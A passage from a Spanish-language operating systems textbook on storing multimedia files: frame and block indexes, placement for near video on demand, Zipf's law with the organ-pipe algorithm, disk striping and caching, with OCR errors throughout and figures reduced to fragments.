archivos sean contiguos no funciona bien, pero en un servidor de video precargado cuidadosamen¬ 
te con peiícuias por adeiantado que no cambian más adeiante, puede funcionar. 

Sin embargo, una compiicación es ia presencia de video, audio y texto, como se muestra en ia 
figura 7-3. Aun si ei video, ei audio y ei texto se aimacenan como archivos contiguos separados, 
se requerirá una búsqueda para avanzar dei archivo de video a uno de audio, y de ahí a un archi¬ 
vo de texto, si fuera necesario. Esto sugiere un segundo arregio posibie de aimacenamiento, don¬ 
de ei video, ei audio y ei texto se entreiazan como se muestra en ia figura 7-19, pero ei archivo 
compieto sigue siendo contiguo. Aquí, ei video para ei cuadro 1 va seguido directamente por ias 
diversas pistas de audio para ei cuadro 1, y después por ias diversas pistas de texto para ei cuadro 
1. Dependiendo de cuántas pistas de audio y texto haya, puede ser más simpie sóio ieer todas ias 
piezas para cada cuadro en una soia operación de iectura de disco y sóio transmitir ias partes ne¬ 
cesarias ai usuario. 



Cuadro 1 


Cuadro 2 


Cuadro 3 


Pista de Pista de 


audio texto 


Figura 7-19. Entrelazado de video, audio y texto en un solo archivo contiguo por pe¬ 
lícula. 


Esta organización requiere una operación de E/S de disco adicionai para ieer ei audio y tex¬ 
to no deseados, y un espacio de búfer adicionai en memoria para aimacenarios. Sin embargo, eii- 
mina todas ias búsquedas (en un sistema de un soio usuario) y no requiere sobrecarga para iievar 
ia cuenta de qué cuadro se encuentra en qué parte dei disco, ya que toda ia peiícuia está en un 
archivo contiguo. Ei acceso aieatorio es imposibie sin esta distribución, pero si no se necesita, ia 
pérdida no es grave. De manera simiiar, es imposibie reaiizar un avance rápido y un retroceso rá¬ 
pido sin estructuras de datos ni una compiejidad adicionaies. 

La ventaja detener una peiícuia compieta como un soio archivo contiguo se pierde en un ser¬ 
vidor de video con varios fiujos de saiida concurrentes, ya que después de ieer un cuadro de una pe¬ 
iícuia, ei disco se tendrá que ieer en cuadros de muchas otras peiícuias antes de regresar ai primero. 
Además, para un sistema en ei que se reaiizan tanto escrituras como iecturas de ias peiícuias (por 
ejempio, un sistema utiiizado para ia producción o edición de video), ei uso de archivos contiguos 
grandes es difícii de reaiizar y no es tan útii. 
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7.7.2 Dos estrategias alternativas de organización de archivos 

Estas observaciones conllevan a otras dos organizaciones para la colocación de archivos multime¬ 
dia. La primera de éstas, el modelo de bloques pequeños, se ilustra en la figura 7-20(a). En esta or¬ 
ganización, el tamaño del bloque de disco se selecciona de manera que sea considerablemente 
menor que el tamaño del cuadro promedio, incluso para los cuadros P y B. Para M PEG-2 a 4 M bps 
con 30 cuadros/seg, el cuadro promedio es de 16 K B, por lo que un tamaño de bloque de 1 K B o 2 
KB funcionaría bien. La idea aquí es tener una estructura de datos, el índice de cuadro, porcada pe¬ 
lícula con una entrada para cada cuadro, apuntando al inicio del cuadro. Cada cuadro en sí consiste 
en todas las pistas de video, audio y texto para ese cuadro como una tirada contigua de bloques de 
disco, como se muestra. De esta manera, la lectura del cuadro k consiste en indexar en el índice 
de cuadro para buscarla k-ésima entrada, y después leer el cuadro completo en una operación de dis¬ 
co. Como los distintos cuadros tienen diferentes tamaños, se necesita el tamaño del cuadro (en blo¬ 
ques) en el índice de cuadro, pero incluso con bloques de disco de 1 K B, un campo de 8 bits puede 
manejar un cuadro hasta de 255 KB, lo cual es suficiente para un cuadro de NTSC descomprimido, 
incluso con muchas pistas de audio. 


índice de índice de 

cuadro bloque 




Figura 7-20. Almacenamiento de película no contiguo, (a) Bloques de disco peque¬ 
ños. (b) B loques de disco grandes. 


La otra forma de almacenar la película es mediante el uso de un bloque de disco grande (por 
decir, de 256 KB) y colocar varios cuadros en cada bloque, como se muestra en la figura 7-20(b). 
De todas formas se necesita un índice, pero ahora es un índice de bloque en vez de uno de cuadro. 
El índice es, de hecho, básicamente el mismo que el nodo-i de la figura 6-15, tal vez con la adición 
de información que indica cuál cuadro está al inicio de cada bloque, para que sea posible localizar 
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un cuadro específico con rapidez. En generai, un bioque no contendrá un número entero de cuadros, 
por io que hay que hacer aigo ai respecto. Existen dos opciones. 

En ia primera opción, que se iiustra en ia figura 7-20(b), cada vez que ei siguiente cuadro no 
cabe en ei bioque actuai, ei resto dei bioque sóio se deja vacío. Este espacio desperdiciado es una 
fragmentación interna, iguai que en ios sistemas de memoria virtuai con páginas de tamaño fijo. Por 
otro iado, nunca es necesario reaiizar una búsqueda en medio de un cuadro. 

La otra opción es henar cada bioque hasta ei finai, dividiendo ios cuadros sobre ios bioques. 
Esta opción introduce ia necesidad de reaiizar búsquedas en medio de ios cuadros, io cuai puede da¬ 
ñar ei rendimiento pero ahorra espacio en disco ai eiiminar ia fragmentación interna. 

Para fines de comparación, ei uso de ios bioques pequeños en ia figura 7-20(a) también des¬ 
perdicia cierto espacio en disco, debido a que no se utiiiza una fracción dei úitimo bioque en ca¬ 
da cuadro. Con un bioque de disco de 1 KB y una peiícuia NTSC de 2 horas que consiste en 
216,000 cuadros, ei espacio en disco desperdiciado será sóio de 108 KB de un totai de3.6 GB. Es 
másdifícii caicuiar ei espacio desperdiciado para ia figura 7-20(b), pero tendrá que ser mucho más 
debido a que, de vez en cuando, quedarán 100 KB ai finai de un bioque, en donde ei siguiente cua¬ 
dro será un cuadro I mayor que ése. 

Por otro iado, ei índice de bioque es mucho menor que ei índice de cuadro. Con un bioque de 
256 K B y un cuadro promedio de 16 K B, caben aproximadamente 16 cuadros en un bioque, por io 
que una peiícuia de 216,000 cuadros sóio necesita 13,500 entradas en ei índice de bioque, en com¬ 
paración con 216,000 para ei índice de cuadro. Por cuestiones de rendimiento, en ambos casos ei 
índice debe iistar todos ios cuadros o bioques (es decir, no hay bioques indirectos como en U NIX), 
por lo que al enlazar hasta 13,500 entradas de 8 bytes en memoria (4 bytes para la dirección de dis¬ 
co, 1 byte para el tamaño del cuadro y 3 bytes para el número del cuadro inicial), en comparación 
con 216,000 entradas de 5 bytes (sólo la dirección de disco y el tamaño), se ahorra casi 1 M B de 
RA M mientras se reproduce la película. 

Estas consideraciones conllevan a las siguientes concesiones: 

1. índice de cuadro: uso más pesado de la RAM mientras se reproduce la película, poco des¬ 
perdicio del disco. 

2. índice de bloque (no se dividen los cuadros entre los bloques): poco uso de la RAM , gran 
desperdicio del disco. 

3. índice de bloque (se pueden dividir los cuadros entre los bloques): poco uso déla RAM ; no 
hay desperdicio de disco; búsquedas adicionales. 

Así, las concesiones implican el uso de la RAM durante la reproducción, desperdicio del espacio 
de disco todo el tiempo y una pérdida de rendimiento durante la reproducción, debido a las búsque¬ 
das adicionales. Noobstante, podemos atacar estos problemas de varias formas. El uso déla RAM 
se puede reducir al paginar partes de la tabla de cuadros justo a tiempo. Las búsquedas durante la 
transmisión de los cuadros se pueden enmascarar mediante un búfer que sea suficiente, pero esto 
introduce la necesidad de memoria adicional y probablemente un copiado adicional. Un buen dise¬ 
ño tiene que analizar con cuidado todos estos factores y realizar una buena elección para la aplica¬ 
ción en cuestión. 


SECCION 7.7 


COLOCACION DE LOSARCHIVOS 


503 


Otro factor aquí es que la administración dei aimacenamiento en disco es más compiicada 
en ia figura 7-20(a), debido a que para aimacenar un cuadro se requiere encontrar una tirada con¬ 
secutiva de bioques dei tamaño correcto. En teoría, esta tirada de bioques no debería cruzar un 

1 imite de pista dei disco, pero con i a desviación de i as cabezas i a pérdida no es grave. Sin embar¬ 
go, hay que evitar cruzar un iímite de ciiindros. Estos requerimientos significan que ei aimacena¬ 
miento iibre dei disco tiene que organizarse como una iista de hoyos de tamaño variabie, en vez 
de una iista de bioques simpie o un mapa de bits, ambos de ios cuaies se pueden utiiizar en ia fi¬ 
gura 7-20(b). 

En todos ios casos, hay mucho que decir en cuanto a coiocar todos ios bioques o cuadros de 
una peiícuia dentro de un rango estrecho, por ejempio, unos cuantos ciiindros, en donde sea posi- 
bie. Dicha coiocación significa queias búsquedas se reaiizan con más rapidez, para que quede más 
tiempo para otras actividades (que no sean de tiempo reai) o para soportar fiujos continuos de vi¬ 
deo adicionaies. Se puede iograr una coiocación restringida de este tipo ai dividir ei disco en gru¬ 
pos de ciiindros y mantener para cada grupo iistas o mapas de bits separados de ios bioques iibres. 
Por ejempio, si se utiiizan hoyos, podría haber una iista para hoyos de 1 KB, una para hoyos de 

2 K B, una para hoyos de 3KB a4KB, otra para hoyos de 5 K B a 8 K B, y así en io sucesivo. 
De esta manera, es fácii encontrar un hoyo de un tamaño dado en un grupo de ciiindros especí¬ 
fico. 

Otra diferencia entre estos dos métodos es ei uso dei búfer. Con ei método de bioques peque¬ 
ños, cada iectura obtiene sóio un cuadro. En consecuencia, una estrategia simpiede búfer dobiefun¬ 
ciona bien: un búfer para reproducir ei cuadro actuai y uno para obtener ei siguiente. Si se utiiizan 
búferes fijos, cada búfer tiene que ser i o bastante grande como para contener ei mayor cuadro I po- 
sibie. Por otra parte, si se asigna un búfer distinto de una reserva en cada cuadro, y se sabe que ei 
tamaño dei cuadro antes de ieerio, se puede eiegir un búfer pequeño para un cuadro P o B. 

En ei caso de bioques grandes se requiere una estrategia más compieja debido a que cada bio- 
que contiene varios cuadros, que posibiemente inciuya fragmentos de cuadros en cada extremo dei 
bioque (dependiendo de ia opción que se haya eiegido antes). Si para mostrar o transmitir cuadros 
tiene que estar contiguos, se deben copiar, pero ei copiado es una operación costosa, por io que se 
debe evitar siempre que sea posibie. Si no se requiere ia contigüidad, entonces se pueden enviar 
cuadros que abarquen iímites de bioque a través de ia red o ai dispositivo de visuaiización en dos 
partes. 

Ei dobie búfer también se puede utiiizar con bioques grandes, pero ei uso de dos bioques gran¬ 
des desperdicia ia memoria. Una manera de resoiver ei desperdicio de memoria es tener un búfer 
de transmisión circuiar un poco más grande que un bioque de disco (porfiujo continuo) queaiimen- 
tea ia red o a ia pantaiia. Cuando ei contenido dei búfer disminuye por debajo de cierto umbrai, se 
iee un nuevo bioque grande dei disco, ei contenido se copia ai búfer de transmisión y ei búfer dei 
bioque grande se devueive a una reserva común. Ei tamaño dei búfer circuiar se debe eiegir de tai 
forma que cuando iiegueai umbrai, haya espacio para otro bioque de disco iieno. La iectura de dis¬ 
co no puede ir directamente ai búfer de transmisión, ya que tendría que ser envoivente. Aquí ei uso 
dei copiado y de ia memoria se intercambian uno contra ei otro. 

Otro factor más para comparar estos dos métodos es ei rendimiento dei disco. Ei uso de bio¬ 
ques grandes hace que ei disco opere a su máxima veiocidad, io cuai es a menudo una cuestión im¬ 
portante. No es eficiente ieer pequeños cuadros P y B como unidades separadas. Además es posibie 
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dividir ios bioques grandes en bandas sobre varias unidades (que veremos a continuación), mien¬ 
tras que dividir en bandas cuadros individuaies sobre varias unidades no. 

La organización en bioques pequeños de ia figura 7-20(a) se conoce aigunas veces como lon¬ 
gitud de tiempo constante, ya que cada apuntador en ei índice representa ei mismo número de mi- 
iisegundos de tiempo de reproducción. Por ei contrario, ia organización de ia figura 7-20(b) se 
conoce aigunas veces como longitud de datos constante, ya que ios bioques de datos son dei mis¬ 
mo tamaño. 

Otra diferencia entre ias dos organizaciones de archivos es que si ios tipos de cuadros se aimace- 
nan en ei índice de ia figura 7-20(a), es posibie reai izar un avance rápido con sóio mostrar ios cuadros 
I. Sin embargo, dependiendo de ia frecuencia con que aparezcan ios cuadros en ei fiujo, ia veiocidad 
se puede percibir como demasiado rápida o demasiado ienta. En cuaiquier caso, con ia organización 
de ia figura 7-20(b), no es posibie ei avance rápido de esta manera. En reaiidad, para ieer ei archivo 
en forma secuenciai y eiegir ios cuadros deseados, se requiere una E/S de disco masiva. 

Un segundo método es utiiizar un archivo especiai que, cuando se reproduzca a ia veiocidad 
normai, dé ia iiusión de un avance rápido a una veiocidad de lOx. Este archivo se puede estructu¬ 
rar de iguai forma que ios otros archivos, utiiizando un índice de cuadro o un índice de bioque. Ai 
abrir un archivo, ei sistema tiene que ser capaz de buscar ei archivo de avance rápido si es necesa¬ 
rio. Si ei usuario oprime ei botón de avance rápido, ei sistema debe buscar y abrir de manera ins¬ 
tantánea ei archivo de avance rápido y después saitar ai iugar correcto en ei archivo. Sabe ei número 
de cuadro en ei que se encuentra, pero necesita ia capacidad de iocaiizar ei cuadro correspondiente 
en ei archivo de avance rápido. Por ejempio, si se encuentra en ei cuadro 4816 y sabe que ei archi¬ 
vo de avance rápido está en lOx, entonces debe iocaiizar ei cuadro 482 en ese archivo y empezar a 
reproducir desde ahí. 

Si seutiiiza un índice de cuadro, esfácii iocaiizar un cuadro específico: sóio seindexa en ei ín¬ 
dice de cuadro. Si se utiiiza un índice de bioque, se necesita información adicionai en cada entrada 
para identificar qué cuadro se encuentra en cada bioque, y se tiene que reaiizar una búsqueda bina¬ 
ria dei índice de bioque. Ei retroceso rápido funciona de una manera anáioga ai avance rápido. 


7.7.3 C olocación de archivos para el video casi bajo demanda 

Hasta ahora hemos anaiizado estrategias de coiocación para ei video bajo demanda. Para ei video 
casi bajo demanda, es más eficiente una estrategia de coiocación de archivos distinta. Recuerde que 
ia misma peiícuia está saiiendo como variosfiujos escaionados. Aún si ia peiícuia se aimacena co¬ 
mo un archivo contiguo, se requiere una búsqueda para cada fiujo. Chen y Thapar (1997) han idea¬ 
do una estrategia de coiocación de archivos para eiiminar casi todas esas búsquedas. Su uso se 
iiustra en ia figura 7-21 para una peiícuia que se reproduce a 30 cuadros/seg, donde se inicia un nue¬ 
vo fiujo cada 5 minutos, como en ia figura 7-17. Con estos parámetros, se necesitan 24 fiujos con¬ 
currentes para una peiícuia de 2 horas. 

En esta coiocación, ios conjuntos de 24 cuadros se concatenan y escriben en ei disco como un 
soio registro. También se pueden ieer de vueita en una soia operación de iectura. Considere ei ins¬ 
tante en ei que apenas empieza ei fiujo 24. Necesitará ei cuadro 0. Ei fiujo 23, que empezó 5 minu¬ 
tos antes, necesitará ei cuadro 9000. Ei fiujo 22 necesitará ei cuadro 18,000, y así en io sucesivo 
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Orden en el que se leen los bloques del disco 


Pista 1 

Pista 2 

Pista 3 

Figura 7-21. Colocación óptima de los cuadros para el video casi bajo demanda. 
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'Cuadro 27002 (aproximadamente 15 minutos en la película) 


hasta regresar a[ f[ujo 0, que necesitará el cuadro 207,000. Ai coiocar estos cuadros en forma con¬ 
secutiva en una pista dei disco, el servidor de video puede satisfacer a ios 24 flujos en orden inver¬ 
so con sólo una búsqueda (para el cuadro 0). Desde luego que los cuadros se pueden invertir en el 
disco, si hay alguna razón por dar servicio a los flujos en orden ascendente. Una vez que se ha da¬ 
do servicio al último flujo, el brazo del disco se puede mover a la pista 2 para prepararse a dar ser¬ 
vicio a todos los flujos de nuevo. Este esquema no requiere que todo el archivo sea contiguo, pero 
de todas formas logra un buen rendimiento para varios flujos a la vez. 

Una estrategia de búfer simple es el uso de doble búfer. Aunque se reproduce el contenido de 
un búfer en 24 flujos, se está cargando otro búfer por adelantado. Cuando termina el actual, los dos 
búferes se intercambian y el que se utilizaba para reproducir ahora se carga en una sola operación 
de disco. 

Una pregunta interesante es qué tan grande debe ser el búfer. Sin duda, tiene que contener 24 
cuadros. Sin embargo, como los cuadros son de tamaño variable, elegir el tamaño correcto del bú¬ 
fer no es una operación trivial. Es exagerado hacer que el búfer sea lo bastante grande como para 
contener 24 cuadros I, pero hacer que tenga el tamaño suficiente para 24 cuadros promedio es vivir 
peligrosamente. 

Por fortuna, para cualquier película se conoce de antemano el cuadro más grande (en el senti¬ 
do de la figura 7-21), así que se puede elegir un búfer que tenga exactamente ese tamaño. Sin em¬ 
bargo, podría ocurrir que en la pista más grande haya, por ejemplo, 16 cuadros I, mientras que la 
siguiente pista más grande tenga sólo nueve cuadros I. Podría ser más acertado elegir un búfer lo 
bastante grande como para el segundo caso más grande. Elegir esta opción significa truncar la pis¬ 
ta más grande, con lo cual se niega a ciertos flujos el acceso a un cuadro en la película. Para evitar 
una falla, se puede volver a mostrar el cuadro anterior. Nadie notará esto. 

Si entramos en más detalles con respecto a este método, si la tercera pista más grande sólo tie¬ 
ne cuatro cuadros I, vale la pena utilizar un búfer capaz de contener cuatro cuadros I y 20 cuadros 
P. Probablemente sea aceptable introducir dos cuadros repetidos para ciertos flujos dos veces en la 
película. ¿Dónde termina esto? Tal vez con un tamaño de búfer que sea lo bastante grande como 
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para 99% de los cuadros. Hay una concesión aquí entre la memoria utilizada para los búferes y la 
calidad délas películas. Observe que entre más flujos simultáneos haya, mejor serán las estadísticas 
y más uniformes serán los conjuntos de cuadros. 

7.7.4 C olocación de varios archivos en un solo disco 

Hasta ahora sólo hemos analizado la colocación de una sola película. Desde luego que en un servi¬ 
dor de video habrá muchas películas. Si se esparcen de manera aleatoria por todo el disco, se des¬ 
perdiciará tiempo al mover la cabeza del disco de película en película, cuando distintos clientes 
estén viendo varias películas al mismo tiempo. 

Esta situación se puede mejorar al observar que ciertas películas son más populares que otras 
y al tener en cuenta la popularidad al colocar las películas en el disco. Aunque se puede decir poco 
sobre la popularidad de las películas específicas en general (aparte del hecho de que tener estrellas 
con renombre parece ayudar), se puede decir algo sobre la popularidad relativa de las películas en 
general. 

Para muchos tipos de concursos de popularidad, como las películas que se rentan, los libros que 
se sacan de una biblioteca, las páginas Web a las que se hace referencia, e incluso las palabras en 
inglés que se utilizan en una novela, o la población de las ciudades más grandes, una aproximación 
razonable de la popularidad relativa va después de un patrón sorprendentemente predecible. Este 
patrón fue descubierto por un profesor de lingüística en Harvard, George Zipf (1902 a 1950), y se 
conoce ahora como ley deZipf. Lo que establece es que si las películas, libros, páginas Web o pa¬ 
labras se clasifican con base en su popularidad, la probabilidad de que el siguiente cliente seleccio¬ 
ne el elemento clasificado como k-ésimo en la lista es de C/k, en donde C es una constante de 
normalización. 

Así, la fracción de ocurrencias para las primeras tres películas son C/1, C/2 y C/3, respectiva¬ 
mente, donde C se calcula de tal forma que la suma de todos los términos sea 1. En otras palabras, 
si hay N películas, entonces 


C/1 + C/2 -L C/3 -L C/4 + - + C/N =1 

De esta ecuación se puede calcular C. Los valores de C para las poblaciones con 10, 100, 1000 y 
10,000 elementos son 0.341, 0.193. 0.134 y 0.102, respectivamente. Por ejemplo, para 1000 pelí¬ 
culas las probabilidades de las primeras cinco películas son 0.134, 0.067, 0.045, 0.034 y 0.027, res¬ 
pectivamente. 

La ley de Zipf se ilustra en la figura 7-22. Sólo por diversión, la hemos aplicado a las pobla¬ 
ciones de las 20 ciudades más grandes en los EE.UU. La ley de Zipf predice que la segunda ciudad 
más grande debe tener una población equivalente a la mitad de la ciudad más grande, y la tercera 
ciudad más grande debe tener una población equivalente a un tercio de la ciudad más grande, etcé¬ 
tera. Aunque difícilmente es perfecto, está muy cerca de serlo. 

Para las películas en un servidor de video, la ley de Zipf establece que la película más popular 
se selecciona dos veces con más frecuencia que la segunda película más popular, tres veces con más 
frecuencia que la tercera película más popular, y así en lo sucesivo. A pesar del hecho de que la dis¬ 
tribución disminuye con mucha rapidez al principio, tiene una larga cola. Por ejemplo, la película 


SECCION 7.7 


COLOCACION DE LOSARCHIVOS 


507 



Clasificación 


Figura 7-22. La curva proporciona la ley deZipf para N = 20. Los cuadros represen¬ 
tan las poblaciones de las 20 ciudades más grandes en los EE.U U., por orden de clasi¬ 
ficación (Nueva York es 1, LosAngeles es 2, Chicago es 3, etcétera). 


50 tiene una popularidad de C/50 y la película 51 tiene una popularidad de C/51, por lo que la pe¬ 
lícula 51 sólo es 50/51 veces más popular que la película 50, una diferencia de sólo 2%. A medida 
que avanzamos por la cola, el porcentaje de diferencia entre peí ículas consecutivas se vuelve cada vez 
menor. Una conclusión es que el servidor necesita muchas películas, ya que hay una demanda consi¬ 
derable para las películas que no están dentro de las primeras 10. 

Al conocer las popularidades relativas de las distintas películas, es posible modelar el rendi¬ 
miento de un servidor de video y utilizar esa información para colocar archivos. Los estudios han 
mostrado que la mejor estrategia es, de manera sorprendente, simple e independiente de la distribu¬ 
ción. Se conoce como el algoritmo de órgano de tubos (Grossman y Silverman, 1973); y Wong, 
1983). Consiste en colocar la película más popular en medio del disco, y colocar la segunda y terce¬ 
ra películas más populares en cualquiera de sus lados. Después de estas películas vienen la cuarta y 
la quinta, y así en lo sucesivo, como se muestra en la figura 7-23. Esta colocación funciona mejor si 
cada película es un archivo contiguo del tipo que se muestra en la figura 7-19, pero también se pue¬ 
de utilizar hasta cierto grado, si cada película está restringida a un rango estrecho de cilindros. El 
nombre del algoritmo proviene del hecho de que un histograma de las probabilidades tiene la apa¬ 
riencia de un órgano ligeramente oblicuo. 

Lo que hace este algoritmo es tratar de mantener la cabeza del disco en medio del disco. Con 
1000 películas y una distribución de la ley deZipf, las primeras cinco películas representan una pro¬ 
babilidad total de 0.307, lo cual significa que la cabeza del disco permanecerá en los cilindros asig¬ 
nados a las primeras cinco películas cerca de 30% del tiempo, una cantidad sorprendentemente 
grande si hay 1000 películas disponibles. 
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Figura 7-23. La distribución tipo "órgano de tubos" de ios archivos en un servidor de 
video. 

7.7.5 C olocación de archivos en varios discos 

Para obtener un rendimiento más alto, los servidores de video tienen con frecuencia muchos dis¬ 
cos que se pueden operar en paralelo. Algunas veces se utilizan RAIDs pero no con frecuencia, 
pues lo que ofrecen los RAIDs es una mayor confiabilidad a cambio del rendimiento. Por lo gene¬ 
ral, los servidores de video desean un alto rendimiento y no se preocupan tanto por corregir los 
errores transitorios. Además, los dispositivos controladores RAID se pueden convertir en un cue¬ 
llo de botella si tienen demasiados discos que manejar a la vez. 

U na configuración más común es simplemente un gran número de discos, lo que algunas veces 
se conoce como granja de discos. Los discos no giran de una manera sincronizada y no contienen 
bits de paridad, como ocurre con los RAIDs. Una posible configuración es colocar la película A 
en el disco 1, la película B en el disco 2, y así en lo sucesivo, como se muestra en la figura 7-24(a). 
En la práctica, con los discos modernos se pueden colocar varias películas en cada disco. 

Esta organización es simple de implementar y tiene características de fallas directas: si un dis¬ 
co falla, todas las películas que contenga no estarán disponibles. Tenga en cuenta que una empresa 
que pierde un disco lleno de películas no tiene tantos problemas como una empresa que pierde un 
disco lleno de datos, ya que las películas se pueden recargar fácil mente en un disco de repuesto des¬ 
de un DVD. Una desventaja de este método es que la carga tal vez no esté bien balanceada. Si al¬ 
gunos discos contienen películas con mucha demanda, y otros discos contienen películas menos 
populares, el sistema no se utilizará a su máxima capacidad. Sin duda, una vez que se conocen las 
frecuencias de uso de las películas, puede ser posible mover algunas de ellas para balancear la car¬ 
ga en forma manual. 

Una segunda organización posible es dividir en bandas cada película sobre varios discos, que 
en el ejemplo de la figura 7-24(b) son cuatro. Vamos a suponer por un momento que todos los cua¬ 
dros son del mismo tamaño (es decir, no tienen compresión). Un número fijo de bytes de la pelícu¬ 
la A se escribe en el disco 1, después se escribe el mismo número de bytes en el disco 2, y así en lo 
sucesivo hasta llegar al último disco (en este caso, con la unidad A3). Después la división en ban¬ 
das continúa otra vez en el primer disco con A4, y así en lo sucesivo hasta que se haya escrito todo 
el archivo. En ese punto se dividen las películas B, C y D en bandas, utilizando el mismo patrón. 

























SECCION 7.7 


COLOCACION DE LOSARCHIVOS 


509 


Disco- 


fCTC) 








(TTC) 




fT^ 



AO 


BO 


co 


DO 


AO 


A1 


A2 


A3 

Al 


B1 


C1 


DI 


A4 


A5 


A6 


A7 

A2 


B2 


C2 


D2 


BO 


B1 


B2 


B3 

A3 


B3 


C3 


D3 


B4 


B5 


B6 


B7 

A4 


B4 


C4 


D4 


co 


C1 


C2 


C3 

A5 


B5 


C5 


D5 


C4 


C5 


C6 


C7 

A6 


B6 


C6 


D6 


DO 


D1 


D2 


D3 

IatJ 


UzJ 


LctJ 


LdtJ 


ImJ 


LdsJ 


LoeJ 


LdtJ 


(a) 


(b) 









AO 


A1 


A2 


A3 

A4 


A5 


A6 


A7 

B3 


BO 


B1 


B2 

B7 


B4 


B5 


B6 

C2 


C3 


co 


C1 

C6 


C7 


C4 


C5 

D1 


D2 


D3 


DO 

sD5^ 




..D7^ 








fTO 



AO 


A2 


A1 


A3 

A6 


A5 


A4 


A7 

B3 


B1 


B2 


BO 

B4 


B7 


B5 


B6 

CO 


C2 


C3 


C1 

C7 


C6 


C4 


C5 

D1 


D2 


D3 


DO 

LpeJ 


LdsJ 


Ld4 J 


Ld7 J 


(c) 


(d) 


Figura 7-24. Cuatro maneras de organizar los archivos multimedia sobre varios discos, 
(a) Sin bandas, (b) M ismo patrón de bandas para todos los archivos, (c) Bandas esca¬ 
lonadas. (d) Bandas aleatorias. 


Una posible desventaja de este patrón de bandas es que, como todas las películas empiezan en 
el primer disco, la carga entre los discos tal vez no esté balanceada. Una manera de esparcir mejor 
la carga es escalonar los discos iniciales, como se muestra en la figura 7-24(c). Otra forma más de 
tratar de balancear la carga es utilizar un patrón de bandas aleatorias para cada archivo, como se 
muestra en la figura 7-24(d). 

Hasta ahora hemos supuesto que todos los cuadros son del mismo tamaño. Con las películas 
M PEG-2, esta suposición es falsa: los cuadros I son mucho más grandes que los cuadros P. Hay dos 
formas de lidiar con esta complicación: dividir en bandas por cuadro o por bloque. Al dividir en 
bandas por cuadro, el primer cuadro de la película A va al disco 1 como una unidad contigua, sin 
importar su tamaño. El siguiente cuadro va al disco 2, y así en lo sucesivo. La película B se divide 
en bandas de una manera similar, ya sea empezando en el mismo disco, en el siguiente (si se utili¬ 
zan bandas escalonadas) o en un disco aleatorio. Como los cuadros se leen uno a la vez, esta forma 
de división en bandas no agiliza la lectura de ninguna película. Sin embargo, esparce la carga sobre 
los discos de una manera mucho más conveniente que en la figura 7-24(a), que se puede compor¬ 
tar mal si muchas personas deciden observar la película A esta noche y nadie desea ver la película 
C. En general, al esparcir la carga sobretodos los discos se utiliza mejor el ancho de banda de dis¬ 
co total, y por ende se incrementa el número de clientes a los que se puede dar servicio. 

La otra forma de dividir en bandas es por bloque. Para cada película se escriben unidades 
de tamaño fijo en cada uno de los discos en sucesión (o al azar). Cada bloque contiene uno o más 
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cuadros o fragmentos de éstos. A hora el sistema puede emitir peticiones para varios bioques a ia 
vez, deia misma peiícuia. Cada petición es para ieerdatosy coiocarios en un búfer distinto de me¬ 
moria, pero de tai forma que cuando se compieten todas ias peticiones haya un trozo contiguo de 
ia peiícuia (que contenga muchos cuadros) ensambiado en ia memoria en forma contigua. Estas 
peticiones pueden proceder en paraieio. Cuando se haya cumpiido ia úitima petición, ei proceso 
que hizo ia soiicitud recibe una señai de que ei trabajo se ha compietado. Entonces puede empe¬ 
zar a transmitir ios datos ai usuario. Varios cuadros después, cuando ei búfer se encuentre en ios 
úitimos cuadros, se emiten más peticiones para cargar otro búfer en forma anticipada. Este méto¬ 
do utiiiza grandes cantidades de memoria para ei búfer, de manera que ios discos se mantengan 
ocupados. En un sistema con 1000 usuarios activos y búferes de 1 M B (por ejempio, utiiizando 
bioques de 256 KB en cada uno de cuatro discos), se necesita 1GB de RAM para ios búferes. Di¬ 
cha cantidad es reiativamente poca en un servidor con 1000 usuarios, por io cuai no debe ser un 
probiema. 

Una cuestión finai en reiación con ia división en bandas es cuántos discos es necesario utiii- 
zar. En un extremo, cada peiícuia se divide en bandas sobretodos ios discos. Por ejempio, con pe- 
iícuias de 2 GB y discos de 1000, se podría escribir un bioque de 2 M B en cada disco, de manera 
que ninguna peiícuia utiiice ei disco dos veces. En ei otro extremo, ios discos se particionan en pe¬ 
queños grupos (como en ia figura 7.24) y cada peiícuia se restringe a una soia partición. Ei primer 
método, conocido como división en bandasampiias, reaiiza un buen trabajo de baiancear ia car¬ 
ga sobre ios discos. Su principai probiema es que, si cada peiícuia utiiiza todos ios discos y un dis¬ 
co faiia, no se puede mostrar ninguna peiícuia. Ei segundo método, conocido como división en 
bandas estrechas, puede sufrir de puntos activos (particiones popuiares), pero ia pérdida de un 
disco sóio arruina a ias peiícuias en su partición. La división en bandas de cuadros de tamaño va- 
riabie se anaiiza con detaiie en sentido matemático en Shenoy y Vin, 1999. 


7.8 USO DE CACHÉ 

La caché de archivos LRU tradicionai no funciona bien con ios archivos muitimedia, debido a que 
ios patrones de acceso para ias peiícuias son distintos a ios patrones de acceso de ios archivos de 
texto. La idea detrás de ias cachés tradicionaies de búfer LRU es que, después de utiiizar un bio¬ 
que, se debe mantener en ia caché en caso dequesevueiva a necesitar casi de inmediato. Por ejem¬ 
pio, ai editar un archivo, ei conjunto de bioques en donde se escribe ei archivo tienden a utiiizarse 
una y otra vez, hasta que termine ia sesión de edición. En otras paiabras, cuando hay una probabi- 
iidad reiativamente aita de que se reutiiizará un bioque dentro de un intervaio corto, vaie ia pena 
mantenerio a ia mano para eiiminar un futuro acceso ai disco. 

Con muitimedia, ei patrón de acceso ordinario es que una peiícuia se vea de principio a fin en 
forma secuenciai. Es improbabie que un bioque se utiiice por segunda vez, a menos que ei usua¬ 
rio rebobine ia peiícuia para ver cierta escena de nuevo. En consecuencia, ias técnicas de caché 
normaies no funcionan. Sin embargo, ei uso de caché puede ayudar de todas formas, pero sóio si 
se utiiiza de manera distinta. En ias siguientes secciones anaiizaremos ei uso de caché para muiti¬ 
media. 
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7.8.1 Caché de bloque 

A unque no tiene sentido mantener un bioque a ia mano, con ia esperanza de que se pueda voiver a 
utiiizar rápidamente, ia predictibiiidad de ios sistemas muitimedia se puede expiotar para queei uso 
de ia caché vueiva a tener utiiidad. Suponga que dos usuarios están viendo ia misma peiícuia, y uno de 
eiios empezó 2 segundos después que ei otro. Una vez que ei primer usuario ha obtenido y ha vis¬ 
to cuaiquier bioque dado, es muy probabie que ei segundo usuario vaya a necesitar ei mismo bio¬ 
que 2 segundos después. Ei sistema puede iievar ia cuenta fáciimentedecuáies peiícuias tienen sóio 
un espectador y cuáies tienen dos o más espectadores espaciados con un intervaio muy corto. 

Así, cada vez que se iee un bioque de una peiícuia que se necesitará de nuevo en poco tiempo, 
puede tener sentido coiocario en caché, dependiendo de cuánto tiempo tenga que estar en ia caché 
y qué tanta memoria haya disponibie. En vez de mantener todos ios bioques de disco en ia caché y 
